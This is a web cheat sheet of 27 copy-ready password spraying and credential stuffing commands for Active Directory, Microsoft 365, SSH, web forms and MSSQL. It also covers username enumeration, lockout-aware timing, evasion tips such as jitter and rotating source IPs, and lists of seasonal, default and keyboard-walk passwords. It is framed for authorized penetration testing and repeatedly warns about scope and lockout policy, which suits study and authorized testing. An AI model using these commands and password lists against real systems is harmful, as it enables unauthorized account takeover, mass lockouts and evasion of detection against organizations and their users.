Password Spraying Cheat Sheet

Copy-ready password spraying and credential stuffing commands for authorized pentests, with lockout-aware timing and scope guidance throughout. (27 payloads)

Try it interactively with the Password & Wordlist Generator

Authorization, Lockout Policy & Scope (read first)

(3)

nxc smb dc01.corp.local -u <validuser> -p '<knownpass>' --pass-pol

Always enumerate the domain password policy BEFORE spraying. Read lockoutThreshold and lockoutObservationWindow so you stay under the bad-password count and reset between rounds. One spray that locks out 5,000 users is an incident, not a test.Requires one valid low-priv credential. Spray attempts/account/window MUST stay below threshold-1.

Get-ADDefaultDomainPasswordPolicy | fl LockoutThreshold,LockoutDuration,LockoutObservationWindow

If you have any authenticated foothold (even a low-priv shell), pull the lockout policy natively. Threshold 0 = no lockout (spray freely but stealthily); threshold N = keep attempts per account to N-1 per observation window.Authorized engagements only. Confirm the policy applies domain-wide; fine-grained password policies (PSOs) can override per-group.

ldapsearch -x -H ldap://dc01 -D 'CORP\\user' -w '<pass>' -b 'DC=corp,DC=local' '(objectClass=domainDNS)' lockoutThreshold lockOutObservationWindow

Same policy check over LDAP from Linux. lockOutObservationWindow is stored as a negative 100-nanosecond interval; divide by -600,000,000 to get minutes. Time your spray rounds to that window plus a safety margin.Confirm the host, account list, and time window are explicitly in your Rules of Engagement before sending a single auth attempt.

Building & Validating User Lists

(4)

kerbrute userenum -d corp.local --dc dc01.corp.local /usr/share/seclists/Usernames/Names/names.txt -o valid_users.txt

Enumerate valid AD usernames via Kerberos pre-auth (AS-REQ). Invalid users return KDC_ERR_C_PRINCIPAL_UNKNOWN; valid ones don't. This is NOT a login attempt, so it does NOT increment the bad-password count or trigger lockouts.The single safest pre-spray step in AD. Feed valid_users.txt into the spray to avoid wasting attempts on non-existent accounts.

for f in $(cat first.txt); do for l in $(cat last.txt); do echo "${f:0:1}$l"; done; done > users.txt

Generate candidate usernames from harvested first/last names in a common corporate format (jsmith = first-initial + last name). Swap the slice/order to produce flast, first.last, firstl, etc., based on the format you observed in emails or LinkedIn.Use OSINT-confirmed naming conventions; validate the generated list with kerbrute userenum before spraying.

python3 namemash.py employees.txt | sort -u > users.txt

Turn a 'Firstname Lastname' employee roster into every common username permutation (flast, first.last, lastf, first_last). Pair with a confirmed email format to filter down to the real convention.Rosters come from authorized OSINT (company site, conference talks, breach-format intel) within engagement scope.

nxc smb dc01.corp.local -u '' -p '' --users | awk '{print $5}' > domain_users.txt

When you have an unauthenticated null/guest session or any valid creds, pull the full domain user list directly from the DC (RID/SAMR enumeration). This is the highest-fidelity source - real accounts, no guessing.Null sessions are often disabled on modern DCs; with creds use -u user -p pass instead of empty strings.

AD Spray Tooling - Kerbrute, NetExec, CrackMapExec

(7)

kerbrute passwordspray -d corp.local --dc dc01.corp.local valid_users.txt 'Spring2026!' --safe -o spray.log

Spray ONE password across all users over Kerberos (fast, no SMB session needed). --safe auto-aborts the run the moment an account lockout is observed, your best in-tool guardrail against cascading lockouts.One password, then WAIT a full lockout observation window before the next. Kerberos pre-auth failures still count toward badPwdCount.

nxc smb targets.txt -u users.txt -p 'Winter2026!' -d corp.local --continue-on-success

Spray a single password against a user list over SMB with NetExec (the maintained CrackMapExec successor). --continue-on-success keeps going after the first hit so you find every reused-credential account in one pass.Each attempt increments badPwdCount on the DC. Stay to one password per round; --continue-on-success is incompatible with command execution.

nxc smb targets.txt -u users.txt -p passwords.txt --no-bruteforce --continue-on-success

--no-bruteforce pairs line-by-line (user1:pass1, user2:pass2) instead of the default cartesian product. Use it for credential stuffing leaked user:pass pairs, NOT for trying every password against every user (that gets people locked out fast).Splitting the file with paste-style pairs prevents the n-by-m blowup that triggers mass lockouts.

nxc ldap dc01.corp.local -u users.txt -p 'Welcome1' -k --continue-on-success

Spray over LDAP/Kerberos instead of SMB. Useful when SMB (445) is filtered but 389/636 are reachable, and it can be quieter against SMB-focused detections. -k uses Kerberos auth.Different protocol, same risk - LDAP bind failures still increment badPwdCount and count toward lockout.

nxc winrm targets.txt -u users.txt -p 'Summer2026!' --continue-on-success

Spray WinRM (5985/5986). A hit here often means immediate interactive access via evil-winrm, since WinRM membership usually implies Remote Management or admin rights. Great post-foothold pivot check.WinRM is less commonly monitored than SMB but logs to Microsoft-Windows-WinRM/Operational; same lockout rules apply.

crackmapexec smb 10.0.0.0/24 -u administrator -p passwords.txt --local-auth --continue-on-success

Spray a LOCAL account (e.g. built-in Administrator, RID 500) across a subnet with --local-auth. Local accounts have NO domain lockout policy, so a shared local admin password across hosts is a classic high-value win.Legacy CrackMapExec syntax (now NetExec/nxc); both accept these flags. Reused local-admin passwords are a top spray finding.

nxc mssql sql01.corp.local -u sa -p passwords.txt --local-auth --continue-on-success

Spray MSSQL SQL-authentication accounts (the 'sa' account and app service logins). SQL logins live outside AD lockout policy and are frequently set to weak or default passwords, then enable xp_cmdshell for code execution.Throttle anyway - SQL audit logging captures failed logins, and repeated 'sa' failures are a loud alert.

Cloud, Web & Generic Spray - o365spray, hydra, MSOLSpray

(5)

o365spray --spray -U users.txt -p 'Spring2026!' --count 1 --lockout 30 --domain corp.com

Spray Microsoft 365 / Azure AD. --count 1 sends one password per round and --lockout 30 forces a 30-minute pause between rounds to respect Smart Lockout. o365spray also validates the tenant and enumerates users first.Azure AD Smart Lockout tracks per-source; rotate egress IPs and stay slow. Conditional Access / MFA may block even valid hits.

Invoke-MSOLSpray -UserList users.txt -Password 'Summer2026!' -Verbose

PowerShell spray against Azure AD that reports valuable detail per hit: valid-creds-but-MFA-required, account disabled/locked, or full success. Knowing 'right password, MFA in the way' is itself a finding worth reporting.Run from an environment whose source IP is in scope; Azure AD sign-in logs record every attempt with the originating IP.

hydra -L users.txt -p 'P@ssw0rd1' ssh://10.0.0.5 -t 4 -W 5

Spray a single password across SSH users with Hydra. -t 4 limits parallel tasks and -W 5 adds a 5-second wait between attempts - dial both down on lockout-enabled or fail2ban-protected hosts.-p (single password) makes this a spray, not -P (full wordlist) which is a brute-force and far likelier to lock or ban.

hydra -L users.txt -p 'Welcome2026!' 10.0.0.5 http-post-form '/login:user=^USER^&pass=^PASS^:F=Invalid credentials' -t 3

Spray a web login form. The F= string is the failure marker Hydra looks for in the response; match it exactly to a wrong-password page or every attempt reads as success. Use S= instead to match a success string.Capture the real POST in Burp first to get field names and the exact failure text. Watch for WAF rate-limiting and CSRF tokens.

hydra -C combos.txt ssh://10.0.0.5 -t 1

Credential stuffing with -C: a colon-separated user:pass file from a breach dataset, tried as exact pairs. -t 1 keeps it one-at-a-time and quiet. This tests password reuse, not password guessing.Only use breach data the engagement explicitly authorizes; pairs avoid the lockout risk of spraying every password at every user.

Lockout-Aware Timing & Throttling

(4)

kerbrute passwordspray -d corp.local --dc dc01 users.txt 'Autumn2026!' --delay 1000 -t 1

Throttle Kerbrute itself: --delay 1000 puts 1 second between attempts and -t 1 sends them serially. Slow, single-threaded sprays blend into normal failed-login noise far better than a burst of hundreds of auths.Speed is the enemy of stealth and the friend of lockouts; for sensitive environments go even slower.

for p in 'Winter2026!' 'Spring2026!' 'Summer2026!'; do nxc smb dc01 -u users.txt -p "$p" --continue-on-success; echo "[*] sleeping observation window..."; sleep 1800; done

The canonical multi-round pattern: ONE password per round, then sleep a full lockout observation window (here 30 min) before the next. This keeps each account's badPwdCount at 1 per window so it can never reach the threshold.Set the sleep to be greater than or equal to the lockoutObservationWindow you pulled from policy. Resist the urge to shorten it.

nxc smb targets.txt -u users.txt -p passwords.txt --ufail-limit 1

Safety net inside NetExec: --ufail-limit stops attempting a given account after N failures so a misjudged run can't march it into lockout. --gfail-limit (global) and --fail-limit (per-target) give the same protection at other scopes.A backstop, not a substitute for policy-aware round timing. Set the limit at or below threshold-1.

nxc smb dc01 -u users.txt -p 'Pass1' --jitter 5-15 --continue-on-success

Add randomized jitter (5-15s) between attempts so the timing looks human rather than a fixed-interval script. Irregular spacing defeats simple 'N failures in M seconds' detection rules.Jitter aids evasion but never reduces lockout risk - the bad-password count is per-attempt regardless of spacing.

Common Seasonal & Default Passwords

(4)

<Season><Year>! -> Winter2026! Spring2026! Summer2026! Autumn2026! Fall2026!

The most productive single guess in AD spraying. Users reset to season+year+! on policy-forced 90-day rotations. Try the CURRENT season first, then the previous one (recently changed) - it works alarmingly often.One season per round to respect lockout. Add the month variant (e.g. June2026!) and two-digit years too.

<CompanyName>1! <CompanyName>2026 Welcome1 Welcome2026! Password1 Password123!

Company name plus a digit/year and the perennial Welcome1 / Password1 family. These survive most complexity policies (upper+lower+digit+symbol) while remaining trivially guessable, which is exactly why they keep landing.Derive the company token from the target's branding. Each new password is a separate round - never stack them.

Default service creds: admin:admin root:toor sa:(blank) admin:password tomcat:tomcat cisco:cisco

Default and vendor credentials for appliances, databases, and management interfaces. Local/service accounts usually sit outside AD lockout policy, making them lower-risk to test and frequently still set to factory values.Check the vendor's documented defaults for the exact device/version; SecLists Passwords/Default-Credentials has curated lists.

kwprocessor or hashcat rules: keyboard walks - Qwerty123! 1qaz@WSX Zxcvbnm1 Asdf1234!

Keyboard-walk patterns that satisfy complexity rules while being muscle-memory easy to type. Generate and test these alongside seasonal guesses; they're a distinct and reliable category of human-chosen passwords.Build a small, targeted spray list (5-10 high-probability guesses) rather than a giant wordlist - quality over quantity keeps you under lockout thresholds.

ShareX LinkedIn Reddit

Level up your security testing

Install the CLI

npx payload-playground

Explore All Tools

Encoding, hashing, JWT & more

Browse Cheat Sheets

Quick-reference payload guides

Related Tools

Password & Wordlist Generator

Related Cheat Sheets

Active Directory & Kerberos Cheat Sheet Hashcat Password Cracking Cheatsheet Hydra Brute Force Cheatsheet

Frequently asked questions

What is the Password Spraying Cheat Sheet?+

It's a quick-reference collection of 27 Password Spraying payloads for testing Password Spraying vulnerabilities during authorized penetration testing, bug bounties, and CTFs. Every payload is copy-ready and grouped by attack context.

How do I use these Password Spraying payloads?+

Copy any payload straight into your authorized test, or use the Password & Wordlist Generator to apply them interactively. Only test systems you have explicit permission to assess.

Are these Password Spraying payloads free to use?+

Yes — this cheat sheet and all Password Spraying payloads are completely free, with no account required. Everything runs in your browser.

$loading...